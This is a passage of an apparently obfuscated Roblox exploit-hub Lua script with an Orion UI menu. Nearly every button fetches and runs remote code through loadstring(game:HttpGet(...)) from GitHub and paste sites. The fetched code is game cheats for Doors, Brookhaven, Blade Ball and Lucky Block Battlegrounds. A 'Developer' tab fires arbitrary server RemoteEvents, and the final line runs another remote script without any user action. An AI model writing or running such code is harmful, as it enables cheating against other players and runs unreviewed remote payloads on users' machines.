TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Door script #3",Callback=function()
	loadstring(game:HttpGet("https://rawscripts.net/raw/DOORS-FFJ-Hub-11365"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Door script #4",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/KINGHUB01/BlackKing-obf/main/Doors%20Blackking%20And%20BobHub"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Door script #5",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/notpoiu/mspaint/main/main.lua"))();
end});
TABLE_TableIndirection["Section%8"] = TABLE_TableIndirection["Gamehub%0"]:AddSection({Name="brookhaven"});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="brookhaven #1",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/REDzHUB/REDzHUB/main/REDzHUB"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="brookhaven #2",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/REDzHUB/REDzHUB/main/REDzHUB"))();
end});
TABLE_TableIndirection["Section%9"] = TABLE_TableIndirection["Gamehub%0"]:AddSection({Name="Blade ball"});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Blade ball #1",Callback=function()
	loadstring(game:HttpGet("https://scriptblox.com/raw/UPD-Blade-Ball-op-autoparry-with-visualizer-8652"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Blade ball #2",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/kidshop4/scriptbladeballk/main/bladeball.lua"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Blade ball #3",Callback=function()
	loadstring(game:HttpGet("https://paste.gg/p/anonymous/1734a4ee207844b994df2f36157afacd/files/1e79ac12fc8a47ef8263d5e9d43b7137/raw"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Blade ball #4",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/kidshop4/scriptbladeballk/main/bladeball.lua"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Blade ball #5",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/1f0yt/community/main/infernofixed"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Blade ball #6",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/3345-c-a-t-s-u-s/-beta-/main/AutoParry.lua"))();
end});
TABLE_TableIndirection["Section2%1"] = TABLE_TableIndirection["Gamehub%0"]:AddSection({Name="Lucky block battlegrounds"});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Lucky block battlegrounds #1",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/Biom49/Script/refs/heads/main/Lucky%20block%20battlegrounds"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Lucky block battlegrounds #2",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/Biom49/Script/refs/heads/main/Lucky%20block%20battleground2"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Lucky block battlegrounds #3",Callback=function()
	loadstring(game:HttpGet("https://github.com/bruhhwtf/LUCKY-BLOCKS-Battlegrounds-GUI/raw/main/Main"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Lucky block battlegrounds #4",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/Secret834/script/refs/heads/main/Luckyblock"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Lucky block battlegrounds #5",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/OfficialHi/AstroHub/main/Loader/Main.lua"))();
end});
TABLE_TableIndirection["Tab9%0"] = TABLE_TableIndirection["Window%0"]:MakeTab({Name="Developer",Icon="rbxassetid://4483345998",PremiumOnly=false});
TABLE_TableIndirection["Section%10"] = TABLE_TableIndirection["Tab9%0"]:AddSection({Name="RemoteEvent"});
TABLE_TableIndirection["remoteEvents%0"] = findRemoteEvents(TABLE_TableIndirection["ReplicatedStorage%0"]);
TABLE_TableIndirection["selectedEventName%0"] = TABLE_TableIndirection["remoteEvents%0"][1] or nil;
TABLE_TableIndirection["Tab9%0"]:AddDropdown({Name="Remote Event",Default=TABLE_TableIndirection["selectedEventName%0"],Options=TABLE_TableIndirection["remoteEvents%0"],Callback=function(value)
	TABLE_TableIndirection["selectedEventName%0"] = value;
end});
TABLE_TableIndirection["Tab9%0"]:AddButton({Name="Execute",Callback=function()
	if TABLE_TableIndirection["selectedEventName%0"] then
		TABLE_TableIndirection["remoteEvent%0"] = TABLE_TableIndirection["ReplicatedStorage%0"]:FindFirstChild(TABLE_TableIndirection["selectedEventName%0"]);
		if (TABLE_TableIndirection["remoteEvent%0"] and TABLE_TableIndirection["remoteEvent%0"]:IsA("RemoteEvent")) then
			TABLE_TableIndirection["remoteEvent%0"]:FireServer();
		end
	end
end});
TABLE_TableIndirection["TabInfo%0"] = TABLE_TableIndirection["Window%0"]:MakeTab({Name="Info",Icon="rbxassetid://4483345998",PremiumOnly=false});
TABLE_TableIndirection["Credit%0"] = TABLE_TableIndirection["TabInfo%0"]:AddSection({Name="Credit"});
TABLE_TableIndirection["Credit%0"]:AddParagraph("Developer", "Zaklom");
TABLE_TableIndirection["Credit%0"]:AddParagraph("Ui", "Orion ui");
TABLE_TableIndirection["Credit%0"]:AddParagraph("Obscurator", "ObscureLua");
TABLE_TableIndirection["Credit%0"]:AddParagraph("You", "for using");
loadstring(game:HttpGet("https://raw.githubusercontent.com/Biom49/Script/refs/heads/main/Script"))();
